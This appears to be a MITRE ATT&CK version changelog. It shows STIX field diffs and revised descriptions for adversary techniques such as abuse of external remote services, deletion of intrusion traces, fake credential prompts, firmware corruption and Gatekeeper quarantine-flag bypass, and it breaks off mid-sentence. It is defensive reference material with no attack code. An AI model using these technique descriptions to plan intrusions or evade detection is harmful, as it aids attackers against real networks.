| Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop) Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation. Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017. | |
| external_references | CAPEC-555 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| external_references | CAPEC-555 | |
| external_references | Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-19 16:57:27.209000+00:00 | 2022-06-16 19:15:22.221000+00:00 |
| external_references[1]['source_name'] | capec | Volexity Virtual Private Keylogging |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/555.html | https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/ |
| external_references[3]['source_name'] | Volexity Virtual Private Keylogging | Unit 42 Hildegard Malware |
| external_references[3]['description'] | Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017. | Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021. |
| external_references[3]['url'] | https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/ | https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ |
| external_references[5]['source_name'] | Unit 42 Hildegard Malware | capec |
| external_references[5]['url'] | https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ | https://capec.mitre.org/data/definitions/555.html |
| x_mitre_data_sources[0] | Application Log: Application Log Content | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Flow | Application Log: Application Log Content |
| x_mitre_version | 2.3 | 2.4 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | David Tayouri | |
| x_mitre_data_sources | Network Traffic: Network Connection Creation | |
| x_mitre_data_sources | Network Traffic: Network Traffic Content |
| Old Description | New Description |
|---|---|
| Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools) | Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del on Windows and rm or unlink on Linux and macOS. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-29 21:34:16.209000+00:00 | 2022-04-16 18:25:43.231000+00:00 |
| description | Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools) | Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del on Windows and rm or unlink on Linux and macOS. |
| external_references[1]['source_name'] | Trend Micro APT Attack Tools | Microsoft SDelete July 2016 |
| external_references[1]['description'] | Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015. | Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February 8, 2018. |
| external_references[1]['url'] | http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/ | https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete |
| x_mitre_data_sources[0] | File: File Deletion | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | File: File Deletion |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). |
Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. dir, show flash, and/or nvram).(Citation: US-CERT-TA18-106A) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Austin Clark, @c2defense'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016. | |
| external_references | US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. | |
| external_references | CAPEC-127 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM'] | |
| external_references | CAPEC-127 | |
| external_references | CAPEC-497 | |
| external_references | Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-23 20:44:32.048000+00:00 | 2022-09-06 21:55:41.262000+00:00 |
| description | Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). |
Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. dir, show flash, and/or nvram).(Citation: US-CERT-TA18-106A) |
| external_references[1]['source_name'] | capec | Windows Commands JPCERT |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/127.html | https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html |
| external_references[2]['source_name'] | capec | US-CERT-TA18-106A |
| external_references[2]['url'] | https://capec.mitre.org/data/definitions/497.html | https://www.us-cert.gov/ncas/alerts/TA18-106A |
| external_references[3]['source_name'] | Windows Commands JPCERT | capec |
| external_references[3]['url'] | https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html | https://capec.mitre.org/data/definitions/127.html |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Process: Process Creation |
| x_mitre_detection | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather file and directory information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use of commands being run by non-standard users from non-standard locations. |
| x_mitre_version | 1.3 | 1.5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/497.html', 'external_id': 'CAPEC-497'} | |
| x_mitre_platforms | Network |
| Old Description | New Description |
|---|---|
| Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). | Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM', 'root'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-13 21:08:10.406000+00:00 | 2022-10-19 17:54:06.038000+00:00 |
| description | Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). | Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior) |
| external_references[1]['source_name'] | Hybrid Analysis Icacls1 June 2018 | falconoverwatch_blackcat_attack |
| external_references[1]['description'] | Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018. | Falcon OverWatch Team. (2022, March 23). Falcon OverWatch Threat Hunting Contributes to Seamless Protection Against Novel BlackCat Attack. Retrieved May 5, 2022. |
| external_references[1]['url'] | https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100 | https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/ |
| external_references[2]['source_name'] | Hybrid Analysis Icacls2 May 2018 | Hybrid Analysis Icacls1 June 2018 |
| external_references[2]['description'] | Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018. | Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018. |
| external_references[2]['url'] | https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110 | https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100 |
| external_references[3]['source_name'] | EventTracker File Permissions Feb 2014 | Hybrid Analysis Icacls2 May 2018 |
| external_references[3]['description'] | Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018. | Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018. |
| external_references[3]['url'] | https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/ | https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110 |
| x_mitre_data_sources[0] | Process: Process Creation | File: File Metadata |
| x_mitre_data_sources[1] | Command: Command Execution | Process: Process Creation |
| x_mitre_data_sources[3] | File: File Metadata | Command: Command Execution |
| x_mitre_version | 2.1 | 2.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'bad_luck_blackcat', 'description': 'Kaspersky Global Research & Analysis Team (GReAT). (2022). A Bad Luck BlackCat. Retrieved May 5, 2022.', 'url': 'https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf'} | |
| external_references | {'source_name': 'fsutil_behavior', 'description': 'Microsoft. (2021, September 27). fsutil behavior. Retrieved January 14, 2022.', 'url': 'https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior'} | |
| external_references | {'source_name': 'EventTracker File Permissions Feb 2014', 'description': 'Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018.', 'url': 'https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/'} | |
| external_references | {'source_name': 'blackmatter_blackcat', 'description': 'Pereira, T. Huey, C. (2022, March 17). From BlackMatter to BlackCat: Analyzing two attacks from one affiliate. Retrieved May 5, 2022.', 'url': 'https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html'} | |
| external_references | {'source_name': 'new_rust_based_ransomware', 'description': 'Symantec Threat Hunter Team. (2021, December 16). Noberus: Technical Analysis Shows Sophistication of New Rust-based Ransomware. Retrieved January 14, 2022.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware'} |
| Old Description | New Description |
|---|---|
| Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards. | Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards. In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'root', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-14 19:31:46.550000+00:00 | 2022-08-31 17:30:05.440000+00:00 |
| description | Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards. | Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards. In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485). |
| external_references[1]['source_name'] | Symantec Chernobyl W95.CIH | cisa_malware_orgs_ukraine |
| external_references[1]['description'] | Yamamura, M. (2002, April 25). W95.CIH. Retrieved April 12, 2019. | CISA. (2022, April 28). Alert (AA22-057A) Update: Destructive Malware Targeting Organizations in Ukraine. Retrieved July 29, 2022. |
| external_references[1]['url'] | https://www.symantec.com/security-center/writeup/2000-122010-2655-99 | https://www.cisa.gov/uscert/ncas/alerts/aa22-057a |
| external_references[2]['source_name'] | MITRE Trustworthy Firmware Measurement | dhs_threat_to_net_devices |
| external_references[2]['description'] | Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016. | U.S. Department of Homeland Security. (2016, August 30). The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations. Retrieved July 29, 2022. |
| external_references[2]['url'] | http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research | https://cyber.dhs.gov/assets/report/ar-16-20173.pdf |
| x_mitre_version | 1.0 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'MITRE Trustworthy Firmware Measurement', 'description': 'Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.', 'url': 'http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research'} | |
| external_references | {'source_name': 'Symantec Chernobyl W95.CIH', 'description': 'Yamamura, M. (2002, April 25). W95.CIH. Retrieved April 12, 2019.', 'url': 'https://web.archive.org/web/20190508170055/https://www.symantec.com/security-center/writeup/2000-122010-2655-99'} | |
| x_mitre_platforms | Network |
| Old Description | New Description |
|---|---|
| Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems attackers may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) | Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-24 18:21:07.926000+00:00 | 2022-03-08 21:05:20.136000+00:00 |
| description | Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems attackers may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) | Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Script: Script Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Script: Script Execution |
| Old Description | New Description |
|---|---|
Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended attribute (xattr) called com.apple.quarantine can be set on the file by the application performing the download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined binary, often using the dlopen function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing Gatekeeper) The quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any application or user with write permissions to the file can change or strip the quarantine flag. With elevated permission (sudo), this attribute can be removed from any file. The presence of the com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/examplefile. Similarly, this attribute 